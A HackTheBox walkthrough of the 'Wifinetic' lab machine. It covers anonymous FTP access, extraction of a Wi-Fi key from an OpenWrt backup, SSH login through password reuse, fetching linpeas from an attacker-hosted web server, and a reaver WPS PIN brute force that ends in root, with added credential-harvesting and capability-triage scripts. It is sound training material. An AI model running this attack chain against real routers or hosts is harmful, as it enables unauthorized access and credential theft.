HackTheBox Writeup - Wifinetic

moko55
5 min read, Sep 23, 2023


Table of Contents:

Step 1: Enumeration

  • Nmap scan.
  • FTP server enumeration.

Step 2: Foothold

  • Data exposure leads to SSH connection.

Step 3: Privilege Escalation

  • Using the reaver wireless attack tool.

Step 1: Enumeration

We start by scanning the target with nmap: -sV for service/version detection, -sC for the default scripts, and -Pn to skip the ICMP host-discovery step.

# nmap -Pn 10.10.11.247 -sV -sC

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.97
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 4434 Jul 31 11:03 MigrateOpenWrt.txt
| -rw-r--r-- 1 ftp ftp 2501210 Jul 31 11:03 ProjectGreatMigration.pdf
| -rw-r--r-- 1 ftp ftp 60857 Jul 31 11:03 ProjectOpenWRT.pdf
| -rw-r--r-- 1 ftp ftp 40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
|_-rw-r--r-- 1 ftp ftp 52946 Jul 31 11:03 employees_wellness.pdf

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)

53/tcp open tcpwrapped
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

The scan reveals three open ports: 21/tcp running vsftpd 3.0.3, where the ftp-anon script confirms that anonymous login is allowed and already lists the directory contents; 22/tcp running OpenSSH 8.2p1; and 53/tcp, which nmap only reports as tcpwrapped (the service behind it, normally DNS, could not be fingerprinted).

Since anonymous login is allowed, we connect to the FTP server as the user anonymous (any string is accepted as the password) and get a listing of the share.

Among the files is backup-OpenWrt-2023-07-26.tar. Configuration backups are always worth a look: they hold the settings an administrator did not want to lose, and on a router that usually includes credentials.

We download it to the attacking machine from the ftp prompt:

ftp> get backup-OpenWrt-2023-07-26.tar

or fetch the whole share in one go with wget, which logs in anonymously by default:

# wget -r ftp://10.10.11.247

Step 2: Foothold

The backup is a plain tar archive. After extracting it (tar -xf backup-OpenWrt-2023-07-26.tar) we find etc/config/wireless, OpenWrt's wireless configuration, which stores the WPA pre-shared key for the SSID OpenWRT in clear text in an option key line.

That gives us a password but no username. The same archive contains etc/passwd, which lists the accounts on the router. Since the backup came from this environment, the obvious move is to try the Wi-Fi key against each of those account names on the target's SSH service, betting on password reuse between the wireless network and a user account.
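As an added example (not part of the original writeup), the script below builds a small constructed OpenWrt-style backup, extracts it, and pulls out exactly the two things the foothold needs: the pre-shared key from etc/config/wireless and the accounts in etc/passwd that have a real login shell. The file layout follows OpenWrt; the PSK and the account list inside the sample are made up for the demo, and extract_backup can be pointed at the real backup-OpenWrt-2023-07-26.tar instead.

```shell
#!/bin/sh
# Added example, not from the writeup: triage an OpenWrt backup tarball for
# credentials. The archive built below is constructed for the demo; point
# extract_backup at the real backup-OpenWrt-*.tar to use it for real.

# Build a constructed backup containing the two files that matter here.
make_sample_backup() {
    dir=$(mktemp -d)
    mkdir -p "$dir/etc/config"
    cat > "$dir/etc/config/wireless" <<'EOF'
config wifi-device 'radio0'
    option type 'mac80211'

config wifi-iface 'wifinet0'
    option device 'radio0'
    option mode 'ap'
    option ssid 'OpenWrt'
    option encryption 'psk2'
    option key 'ExamplePsk123!'
EOF
    cat > "$dir/etc/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/ash
daemon:x:1:1:daemon:/var:/bin/false
netadmin:x:1000:1000:netadmin:/home/netadmin:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
EOF
    (cd "$dir" && tar -cf backup.tar etc)
    printf '%s\n' "$dir/backup.tar"
}

# Extract a backup into a fresh directory and print that directory.
extract_backup() {
    out=$(mktemp -d)
    tar -xf "$1" -C "$out"
    printf '%s\n' "$out"
}

# Print every pre-shared key in the UCI wireless config ("option key '...'").
wifi_keys() {
    sed -n "s/^[[:space:]]*option key '\(.*\)'[[:space:]]*$/\1/p" "$1/etc/config/wireless"
}

# Print accounts whose login shell is usable (not nologin or false).
login_users() {
    awk -F: '$7 !~ /\/(nologin|false)$/ { print $1 }' "$1/etc/passwd"
}

backup=$(make_sample_backup)
root_dir=$(extract_backup "$backup")
echo "Wi-Fi key(s): $(wifi_keys "$root_dir")"
echo "Login users:  $(login_users "$root_dir" | tr '\n' ' ')"
# Next step: try each key against each user, e.g. ssh netadmin@10.10.11.247
rm -rf "${backup%/backup.tar}" "$root_dir"
```

On the real archive, run the same two functions against the extraction directory; anything wifi_keys prints is a candidate password for every name login_users prints.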

The Wi-Fi key works as the password for the user netadmin:

 # ssh netadmin@10.10.11.247    // password : VeRyUn!

We now have a shell as netadmin and can read the user flag from the home directory.

Step 3: Privilege Escalation

Once on the box, the quickest way to enumerate privilege-escalation paths is linpeas. Serve it from the attacking machine and fetch it on the target:

1- On the attacking machine, serve the script over HTTP:

# python3 -m http.server 80

2- On the target, download it (then run it with bash linpeas.sh):

# wget http://Your-IP:80/linpeas.sh

One of linpeas' findings stands out: the reaver binary has been granted the cap_net_raw file capability, which lets it open raw network sockets (normally reserved for root) no matter which user runs it. In other words it has full access over network sockets, which is exactly what a wireless attack tool needs in order to inject and capture frames.

Running the binary with no arguments confirms what we are dealing with: Reaver v1.6.5 WiFi Protected Setup Attack Tool, a brute-forcer for WPS PINs that, once it has the PIN, recovers the access point's WPA pre-shared key.
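What linpeas surfaces here is a file capability; the underlying check is `getcap -r / 2>/dev/null`. The script below is an added example (not part of the writeup and not linpeas' code): it parses getcap's output, in both the older `path = caps+ep` layout and the newer `path caps=ep` layout, and prints only the binaries holding capabilities that commonly lead to privilege escalation. The sample output it runs over is constructed for the demo, not captured from the target.

```shell
#!/bin/sh
# Added example, not from the writeup: triage file capabilities the way
# linpeas does, without linpeas. Feed it `getcap -r / 2>/dev/null`.

# Read getcap output on stdin and print "path capability" for every
# capability on the watch list (names per capabilities(7)). Handles both
# "/path = cap_a,cap_b+ep" (older libcap) and "/path cap_a,cap_b=ep".
interesting_caps() {
    awk '
    BEGIN {
        n = split("cap_net_raw cap_net_admin cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner", w, " ")
        for (i = 1; i <= n; i++) want[w[i]] = 1
    }
    NF >= 2 {
        path = $1
        caps = $NF                 # the capability set is always the last field
        sub(/[=+].*$/, "", caps)   # strip the "=ep" / "+ep" flag suffix
        m = split(caps, c, ",")
        for (i = 1; i <= m; i++) if (c[i] in want) print path, c[i]
    }'
}

# Constructed sample of getcap output (not captured from the target).
sample_getcap='/usr/bin/ping cap_net_raw=ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/reaver cap_net_raw=ep
/usr/lib/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/traceroute6 cap_net_bind_service=ep'

printf '%s\n' "$sample_getcap" | interesting_caps
# Live use on the target: getcap -r / 2>/dev/null | interesting_caps
```

Binaries like ping legitimately carry cap_net_raw; what makes reaver interesting is that the capability sits on an attack tool that can use it against the access point the box is running.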

Reaver needs two things: a monitor-mode wireless interface to talk through and the BSSID (MAC address) of the target access point.

iwlist scan lists the wireless interfaces and the networks each one can see:

netadmin@wifinetic:/tmp$ iwlist scan

The scan from wlan1 shows a cell for the OpenWRT access point, which gives us its BSSID:

bssid  :  02:00:00:00:00:00

The interface list also contains mon0, a monitor-mode interface, which is the one reaver should use.

We now run reaver against it:

netadmin@wifinetic:/tmp$ reaver -i mon0 -b 02:00:00:00:00:00

-i --> the monitor interface to use

-b --> the BSSID of the target access point
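Why reaver can afford to brute-force the PIN is worth seeing. A WPS PIN is eight digits; the access point confirms the first four digits and the next three separately, and the eighth digit is a checksum of the other seven, so there are at most 10,000 + 1,000 = 11,000 candidates rather than 10^8. The script below is an added example, not reaver's code and not part of the writeup; it implements that checksum (the same arithmetic reaver uses when it generates candidate PINs) and a validator for a full PIN.

```shell
#!/bin/sh
# Added example, not from the writeup: the WPS PIN checksum behind reaver's
# small search space. An 8-digit WPS PIN is checked by the AP in two halves
# (4 digits, then 3 digits + checksum), so at most 10^4 + 10^3 PINs are needed.

# Checksum digit for the first seven digits of a WPS PIN: digits in the odd
# positions (counting from the right) weigh 3, the others weigh 1, and the
# checksum makes the weighted sum a multiple of 10.
wps_checksum() {
    pin=$(printf '%s' "$1" | sed 's/^0*//')   # no leading zeros: $(( )) would read them as octal
    pin=${pin:-0}
    accum=0
    while [ "$pin" -gt 0 ]; do
        accum=$((accum + 3 * (pin % 10))); pin=$((pin / 10))
        accum=$((accum + pin % 10));       pin=$((pin / 10))
    done
    echo $(( (10 - accum % 10) % 10 ))
}

# Exit 0 if the 8-digit PIN in $1 carries a valid checksum, 1 otherwise.
wps_pin_valid() {
    case $1 in
        [0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]) ;;
        *) return 1 ;;
    esac
    [ "$(wps_checksum "${1%?}")" = "${1#???????}" ]
}

# Count the PINs in the integer range [$1, $2] that pass the checksum.
count_valid_pins() {
    i=$1; n=0
    while [ "$i" -le "$2" ]; do
        if wps_pin_valid "$(printf '%08d' "$i")"; then n=$((n + 1)); fi
        i=$((i + 1))
    done
    echo "$n"
}

echo "checksum of 1234567 is $(wps_checksum 1234567): 12345670 is the well-known default PIN"
echo "valid PINs among 00000000..00000099: $(count_valid_pins 0 99) (one in ten)"
echo "worst case for reaver: $((10000 + 1000)) attempts instead of $((100000000))"
```

The checksum alone only cuts the space by a factor of ten; the real weakness is that the protocol leaks whether each half of the PIN is right, which is what turns 10^7 into 11,000.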

Reaver brute-forces the WPS PIN and, once it has it, prints the WPA PSK of the access point. This is a different password from the one in the backup, and it turns out to be reused for the root account, so we switch user with it:

# su   // password : WhatIsReal!

We are root and can read the root flag.

moko55

Penetration Tester | Pro-Hacker | CyberSecurity Engineer